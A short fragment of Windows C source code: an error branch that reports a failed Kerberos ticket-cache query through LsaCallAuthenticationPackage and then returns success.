else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message : %08x\n", status);
return STATUS_SUCCESS;
}